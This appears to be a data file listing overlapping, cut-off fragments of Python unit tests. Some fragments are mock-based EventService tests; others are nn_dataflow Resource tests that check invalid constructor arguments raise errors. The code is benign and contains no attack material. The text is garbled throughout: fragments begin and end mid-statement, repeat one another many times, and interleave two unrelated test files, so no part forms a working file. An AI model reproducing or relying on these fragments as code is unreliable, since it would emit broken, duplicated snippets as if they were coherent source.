"= self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response",
"= Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response",
"self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect",
"self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\")",
"test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if",
"from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService')",
"self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event]",
"response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event] else:",
"self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return [self.event] else: return None",
"EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService",
"Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event",
"TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase):",
"self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event)",
"def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response",
"self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self):",
"test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect =",
"self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def",
"Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self,",
"@patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value",
"= self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response, Event) def side_effect(self, id): if (id==\"1\"): return",
"= MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def",
"self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event)",
"response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId()",
"Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self):",
"rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\",",
"from unittest import TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event,",
"EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService()",
"MockEventService() self.eventService.create.return_value = self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self):",
"MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event def",
"setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1}) self.eventService = MockEventService() self.eventService.create.return_value = self.event",
"self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response = self.eventService.getId() self.assertIsInstance(response, Event) def",
"from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event =",
"= self.event def test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect =",
"Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def setUp(self, MockEventService): self.event = Event(type=\"test\", data={\"data\": 1})",
"= self.eventService.getId() self.assertIsInstance(response, Event) def test_GetIdEvent_NotFound_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"0\") response = self.eventService.getId() self.assertNotIsInstance(response,",
"unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService class EventsTest(TestCase): @patch('rpiatipo.Events.EventService') def",
"unittest import TestCase from unittest.mock import patch, Mock from rpiatipo.Events import Event, EventService",
"test_CreateEvent_EventService(self): response = self.eventService.create() self.assertIsInstance(response, Event) def test_GetIdEvent_Success_EventService(self): self.eventService.getId.side_effect = self.side_effect(\"1\") response ="
] |
[
"test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2,",
"with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError,",
"self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"= NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource",
".*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ =",
"array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License for more details.",
"0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1),",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region",
"dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def",
"def test_invalid_dim_array(self): ''' Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region,",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with",
"class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2),",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dim_array(self): ''' Invalid dim_array.",
"self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width, 8, 'array_bus_width')",
"''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"''' Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"'array_bus_width') self.assertEqual(resource.dram_bandwidth, 128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with",
"NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): ''' Invalid dram_region with",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid",
"size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError,",
"the terms of the Modified BSD-3 License as published by the Open Source",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=None, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _",
"''' def setUp(self): self.proc_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2,",
"src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region,",
"no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*no_time_mux.*'): _",
"implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3",
"dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'):",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region,",
"with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2),",
"from nn_dataflow.core import Resource class TestResource(unittest.TestCase): ''' Tests for Resource. ''' def setUp(self):",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with",
"'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"The Board of Trustees of Stanford University This program is free software: you",
"array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): ''' Invalid no_time_mux. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"License along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from",
"'proc_region') self.assertTupleEqual(resource.dram_region.dim, (2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf,",
"dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width.",
"'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8,",
"the Modified BSD-3 License as published by the Open Source Initiative. This program",
".*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=-2, dram_bandwidth=128,",
"test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=(512,),",
"but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS",
"128, 'dram_bandwidth') self.assertFalse(resource.no_time_mux, 'no_time_mux') def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_proc_region_dram(self): '''",
"along with this program. If not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core",
"that it will be useful, but WITHOUT ANY WARRANTY; without even the implied",
"Valid arguments. ''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import PhyDim2 from nn_dataflow.core import Resource",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2, 2), dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with",
"self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0),",
"16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ =",
"= NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC) self.dram_region = NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM)",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError,",
"def test_invalid_proc_region(self): ''' Invalid proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*proc_region.*'): _ = Resource(proc_region=PhyDim2(2,",
"def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region,",
"Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16),",
"dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self):",
") def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ =",
"no_time_mux=False, ) def test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError,",
"test_invalid_proc_region_dram(self): ''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _",
"Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, )",
"warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the BSD-3 License",
"NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.src_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region",
"Invalid array_bus_width. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"more details. You should have received a copy of the Modified BSD-3 License",
"size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with",
"def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region,",
"'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512,",
"not, see <https://opensource.org/licenses/BSD-3-Clause>. \"\"\" import unittest from nn_dataflow.core import NodeRegion from nn_dataflow.core import",
"size_regf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_regf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"'Resource: .*no_time_mux.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"(2, 2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf')",
"'Resource: .*dram_.*type.*'): _ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid",
"''' Invalid proc_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ =",
"1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM) def test_valid_args(self): ''' Valid arguments. ''' resource = Resource(proc_region=self.proc_region,",
"type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource: .*proc_.*type.*'): _ = Resource(proc_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0),",
"no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16,",
"Invalid dim_array. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dim_array.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region,",
"size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with self.assertRaisesRegexp(TypeError,",
"def test_invalid_dram_region(self): ''' Invalid dram_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_region.*'): _ = Resource(proc_region=self.proc_region,",
"array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource:",
") def test_invalid_dram_region_proc(self): ''' Invalid dram_region with type DRAM. ''' with self.assertRaisesRegexp(ValueError, 'Resource:",
") def test_invalid_size_gbuf(self): ''' Invalid size_gbuf. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ =",
"array_bus_width=-2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_dram_region_proc(self): '''",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*dst_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=PhyDim2(2, 1), dim_array=PhyDim2(16, 16),",
"dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) with",
"= NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 0), type=NodeRegion.DRAM) self.dst_data_region = NodeRegion(dim=PhyDim2(2, 1), origin=PhyDim2(0, 1), type=NodeRegion.DRAM)",
"copy of the Modified BSD-3 License along with this program. If not, see",
"16), size_gbuf=131072, size_regf=(512,), array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_array_bus_width(self): ''' Invalid array_bus_width. '''",
"_ = Resource(proc_region=self.proc_region, dram_region=PhyDim2(2, 2), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"under the terms of the Modified BSD-3 License as published by the Open",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*size_gbuf.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=(131072,),",
"size_gbuf=(131072,), size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_size_regf(self): ''' Invalid size_regf. ''' with",
"Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8,",
"''' resource = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=0, no_time_mux=False, ) def test_invalid_no_time_mux(self): '''",
"size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False, ) with self.assertRaisesRegexp(ValueError, 'Resource: .*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
"dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) self.assertTupleEqual(resource.proc_region.dim, (2, 2), 'proc_region')",
"no_time_mux=False, ) def test_invalid_dram_bandwidth(self): ''' Invalid dram_bandwidth. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _",
"the BSD-3 License for more details. You should have received a copy of",
"_ = Resource(proc_region=self.proc_region, dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"2), 'dram_region') self.assertTupleEqual(resource.dim_array, (16, 16), 'dim_array') self.assertEqual(resource.size_gbuf, 131072, 'size_gbuf') self.assertEqual(resource.size_regf, 512, 'size_regf') self.assertEqual(resource.array_bus_width,",
"dram_region=NodeRegion(dim=PhyDim2(2, 2), origin=PhyDim2(0, 0), type=NodeRegion.PROC), src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128,",
"_ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=1.2, dram_bandwidth=128, no_time_mux=False,",
".*array_bus_width.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=0, dram_bandwidth=128,",
"with self.assertRaisesRegexp(TypeError, 'Resource: .*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=128, no_time_mux=False, ) def test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with",
"self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=PhyDim2(2, 1), dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072,",
"test_invalid_data_region(self): ''' Invalid src/dst_proc_region. ''' with self.assertRaisesRegexp(TypeError, 'Resource: .*src_data_.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region,",
".*dram_bandwidth.*'): _ = Resource(proc_region=self.proc_region, dram_region=self.dram_region, src_data_region=self.src_data_region, dst_data_region=self.dst_data_region, dim_array=PhyDim2(16, 16), size_gbuf=131072, size_regf=512, array_bus_width=8, dram_bandwidth=-3,",
